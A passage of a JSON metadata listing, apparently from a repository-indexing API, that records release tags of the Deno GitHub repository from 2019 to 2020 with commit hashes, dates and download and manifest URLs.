0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repos